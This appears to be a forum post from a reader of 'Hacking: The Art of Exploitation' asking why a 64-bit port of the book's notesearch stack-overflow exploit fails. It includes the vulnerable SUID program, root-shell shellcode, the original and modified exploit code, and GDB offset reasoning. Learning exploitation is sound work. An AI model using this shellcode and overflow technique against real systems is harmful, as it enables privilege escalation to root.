Disclaimer: I believe a lot of the code I pasted is unnecessary (e.g. the functions in the notesearch program and the alterations in the exploit), but I included it for clarity. I don't want to scare anyone off with the long post, so I figured I ought to explain beforehand.
I am currently reading the book Hacking: The Art of Exploitation by Jon Erickson. The book comes with a virtual machine designed to provide a consistent environment in which the examples work, but I've decided to try to get through the book in my own environment to challenge my understanding of the material.
I am currently reading about stack-based buffer overflows: exploiting unchecked buffers to overwrite the return address of a function, sliding down a NOP sled, and executing shellcode. The program we are exploiting is as follows:
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include "hacking.h"
#define FILENAME "/var/notes"
int print_notes(int, int, char*); // Note printing function
int find_user_note(int, int); // Seek in file for a note for user.
int search_note(char*, char*); // Search for keyword function.
void fatal(char*); // Fatal error handler
int main(int argc, char *argv[]) {
    int userid, printing=1, fd; // File descriptor
    char searchstring[100];
    if(argc > 1)
        strcpy(searchstring, argv[1]); // Unchecked copy of argv[1].
    else
        searchstring[0] = 0;
    userid = getuid();
    fd = open(FILENAME, O_RDONLY);
    if(fd == -1)
        fatal("in main() while opening file for reading");
    while(printing)
        printing = print_notes(fd, userid, searchstring);
    printf("-------[ end of note data ]-------\n");
    close(fd);
}
// A function to print the notes for a given uid that match
// an optional search string;
// returns 0 at end of file, 1 if there are still more notes.
int print_notes(int fd, int uid, char *searchstring) {
    int note_length;
    char byte = 0, note_buffer[100];
    note_length = find_user_note(fd, uid);
    if(note_length == -1) // If end of file reached,
        return 0; // return 0.
    read(fd, note_buffer, note_length); // Read note data.
    note_buffer[note_length] = 0; // Terminate the string.
    if(search_note(note_buffer, searchstring)) // If searchstring found,
        printf(note_buffer); // print the note.
    return 1;
}
// A function to find the next note for a given userID;
// returns -1 if the end of the file is reached;
// otherwise, it returns the length of the found note.
int find_user_note(int fd, int user_uid) {
    int note_uid = -1;
    unsigned char byte;
    int length;
    while(note_uid != user_uid) { // Loop until a note for user_uid is found.
        if(read(fd, &note_uid, 4) != 4) // Read the uid data.
            return -1; // If 4 bytes aren't read, return end of file code.
        if(read(fd, &byte, 1) != 1) // Read the newline separator.
            return -1;
        byte = length = 0;
        while(byte != '\n') { // Figure out how many bytes to the end of line.
            if(read(fd, &byte, 1) != 1) // Read a single byte.
                return -1;
            length++;
        }
    }
    lseek(fd, length * -1, SEEK_CUR); // Rewind file reading by length bytes.
    printf("[DEBUG] found a %d byte note for user id %d\n", length, note_uid);
    return length;
}
// A function to search a note for a given keyword;
// returns 1 if a match is found, 0 if there is no match.
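int search_note(char *note, char *keyword) {
    int i, keyword_length, match=0;
    keyword_length = strlen(keyword);
    if(keyword_length == 0) // If there is no search string,
        return 1; // always "match".
    for(i = 0; i < strlen(note); i++) { // Iterate over bytes in note.
        if(note[i] == keyword[match]) // If byte matches keyword,
            match++; // get ready to check the next byte;
        else {
            if(note[i] == keyword[0]) // if that byte matches first keyword byte,
                match = 1; // start the match count at 1;
            else
                match = 0; // otherwise reset it to zero.
        }
        if(match == keyword_length) // If there is a full match,
            return 1; // return matched.
    }
    return 0; // Return not matched.
}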
The vulnerability occurs on the line:
char searchstring[100];
This buffer is filled by strcpy() without any length check, so the attacker is able to write past the end of it and overwrite the return address. This program is accompanied by a note taker program, and it is assumed both that /var/notes exists and that this program is SUID root in order to allow access to this file.
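For illustration, here is a minimal sketch of the length check that is missing from the strcpy() call in main(). The helper name copy_checked is made up for this example and does not appear in the book; it only shows the kind of bound that would keep a long argv[1] inside the 100-byte buffer.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not from the book): copies src into dst only if it
 * fits, including the terminating NUL byte.
 * Returns 0 on success, -1 if src would overflow dst. */
int copy_checked(char *dst, size_t dst_size, const char *src) {
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;              /* would write past the end of dst */
    memcpy(dst, src, len + 1);  /* copy the string and its NUL terminator */
    return 0;
}
```

With a 100-byte destination, a short keyword is copied normally, while a 200-character argument is rejected instead of spilling over the saved return address.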
The book provides the code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
    unsigned int i, *ptr, ret, offset=270;
    char *command, *buffer;
    command = (char *) malloc(200);
    bzero(command, 200); // zero out the new memory
    strcpy(command, "./notesearch \'"); // start command buffer
    buffer = command + strlen(command); // set buffer at the end
    if(argc > 1) // set offset
        offset = atoi(argv[1]);
    ret = (unsigned int) &i - offset; // set return address
    for(i=0; i < 160; i+=4) // fill buffer with return address
        *((unsigned int *)(buffer+i)) = ret;
    memset(buffer, 0x90, 60); // build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
    strcat(command, "\'");
    system(command); // run exploit
    free(command);
}
The code above is meant to take advantage of this overflow. Unfortunately, it does not work on a 64-bit system: pointers are 8 bytes instead of 4, so &i cannot be cast to an unsigned int without losing data. I therefore changed the code to:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
    uint64_t i, ret, offset=256;
    char *command, *buffer;
    command = (char *) malloc(400);
    bzero(command, 400); // Zero out the new memory.
    strcpy(command, "./notesearch \'"); // Start the command buffer.
    buffer = command + strlen(command); // Set the buffer at the end.
    if(argc > 1) // Set offset.
        offset = atoi(argv[1]);
    ret = (uint64_t) &i - offset; // Set return address.
    for(i=0; i < 376; i+=8) // Fill buffer with return address.
        *((uint64_t *) buffer + i) = ret;
    memset(buffer, 0x90, 200); // Build NOP sled.
    memcpy(buffer+200, shellcode, sizeof(shellcode)-1);
    strcat(command, "\'");
    system(command); // Run exploit.
    free(command);
}
(Note: the altered offset and the initial value of i are products of my experimentation, and I know they are not correct.) I changed every int to uint64_t so that the pointer could be cast without losing data. I also changed the increment of i in the for loop to 8 so that the copies of the return address would be spaced 8 bytes apart.
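As a side check on the two changes described above, the sketch below tests whether an address survives being squeezed into 32 bits, and compares the byte offset addressed by the two possible placements of the uint64_t * cast. All function names are made up for illustration, and the buffer passed in is assumed to be 8-byte aligned with i a multiple of 8.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if storing addr in a 32-bit unsigned integer would drop bits. */
int truncated_by_u32(uint64_t addr) {
    return (uint64_t)(uint32_t)addr != addr;
}

/* Byte offset addressed by *((uint64_t *)(buf + i)):
 * i is added in bytes, then the result is cast. */
ptrdiff_t byte_offset_add_then_cast(char *buf, size_t i) {
    return (char *)((uint64_t *)(buf + i)) - buf;
}

/* Byte offset addressed by *((uint64_t *) buf + i):
 * the cast happens first, so i is scaled by sizeof(uint64_t). */
ptrdiff_t byte_offset_cast_then_add(char *buf, size_t i) {
    return (char *)((uint64_t *)buf + i) - buf;
}
```

A stack address such as 0x7fffffffddf0 does not fit in 32 bits, whereas a 32-bit stack address such as 0xbffff7f0 does. For i = 8, the first form addresses byte 8 of the buffer and the second addresses byte 64, because arithmetic on a uint64_t * moves in 8-byte steps.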
From here, I needed to determine a new value for the offset, so I ran the exploit in GDB. The address of i came out to be 0x7fffffffddf0. I stepped through the program until I was inside the call to system(), and it seemed that the return address was pushed onto the stack at address 0x7fffffffddc8 and was set to the value 0x00400660. This value was pushed onto the stack from register r12 at the beginning of the function and appeared to be in the text segment of memory, so I went ahead and assumed it was the return address.
The stack pointer was then decremented by 0x178, and I used the nexti instruction followed by x/100hw $rsp to see how the stack was changing. I needed to know where the buffer was loaded into memory relative to the return address, both to align the copies of the return address and to work out the offset used to guess the location of the NOP sled. I ended up getting to the end of the program without ever seeing much of a change in the memory between the return address and $rsp.
From here I figured that I could run the notesearch program in GDB to get a sense of the way the stack frame is constructed. I ran the program with the argument "AAAAAAAAAAAAAAAAAAAA" and stepped through the assembly line by line. It appeared that the buffer was loaded 32 bytes above the value of $rsp, and with this information I was able to figure out the length of the buffer. I knew that $rsp was 0x178 (376) bytes away from the return address, and I knew that the buffer began 32 bytes above $rsp. From this I figured that the exploit would need to write 344 bytes to reach and overwrite the return address.
By subtracting the value of $rsp (0x7fffffffdc50) from the address of i (0x7fffffffddf0), I was able to determine that the stack frame of the notesearch program began 416 bytes before the variable i, and that the buffer was placed 384 bytes before the variable i. I then built a 200 byte NOP sled, and put the shellcode right after this.
I then needed to determine the return address I would be writing in order to hit the NOP sled and execute the shellcode. I figured that 128 bytes into a 200 byte NOP sled would be pretty central and provide decent padding for any errors. I calculated this to be at memory address 0x7fffffffdcf0, which would require an offset of 256 bytes from i to hit. I used this as the offset value, and then executed the program.
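The arithmetic in the last three paragraphs can be written out as a small sketch. It only reproduces the subtraction described above and assumes, as the post does, that the address of i in the exploit and the value of $rsp in notesearch are directly comparable. The struct and function names are made up for illustration.

```c
#include <stdint.h>

/* Illustrative container for the distances discussed in the post. */
struct layout {
    uint64_t frame_to_i;   /* &i minus $rsp */
    uint64_t buffer_to_i;  /* &i minus start of searchstring */
    uint64_t bytes_to_ret; /* bytes from buffer start to the return address */
    uint64_t target;       /* address aimed at inside the NOP sled */
    uint64_t offset;       /* value subtracted from &i to get target */
};

/* buf_above_rsp: distance from $rsp up to the buffer (32 in the post).
 * ret_above_rsp: distance from $rsp up to the return address (0x178).
 * sled_depth:    how far into the NOP sled to aim (128). */
struct layout compute_layout(uint64_t addr_i, uint64_t rsp,
                             uint64_t buf_above_rsp,
                             uint64_t ret_above_rsp,
                             uint64_t sled_depth) {
    struct layout l;
    uint64_t buffer = rsp + buf_above_rsp;

    l.frame_to_i   = addr_i - rsp;
    l.buffer_to_i  = addr_i - buffer;
    l.bytes_to_ret = ret_above_rsp - buf_above_rsp;
    l.target       = buffer + sled_depth;
    l.offset       = addr_i - l.target;
    return l;
}
```

Calling compute_layout(0x7fffffffddf0, 0x7fffffffdc50, 32, 0x178, 128) gives 416, 384, 344, 0x7fffffffdcf0, and 256, matching the figures above. Whether those inputs describe the real layout at run time is a separate question.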
As you may have already gleaned, this approach did not work. I was greeted with:
[DEBUG] found a 7 byte note for user id 1000
-------[ end of note data ]-------
*** stack smashing detected ***: ./notesearch terminated
Aborted (core dumped)
I figured that this might be due to misalignment of the return address when building the buffer, so I tried changing the initial value of i in the for loop to 4, then to 8, then to 12, but none of these gave me a different result. I also tried setting the offset to its theoretical extremes, but this did not work either.
My question is, what did I do wrong in my calculations? I suspect that the buffer was not written to the place where I think it was, because in the initial test, where I stepped into the call to system() rather than running notesearch independently, I did not see the buffer show up on the stack. It is also possible that I am missing something entirely about the way that a stack frame is constructed, or some other complexity in the compilation of the program.
So, what did I do wrong, and how can I generalize my approach so that I get it right in the future?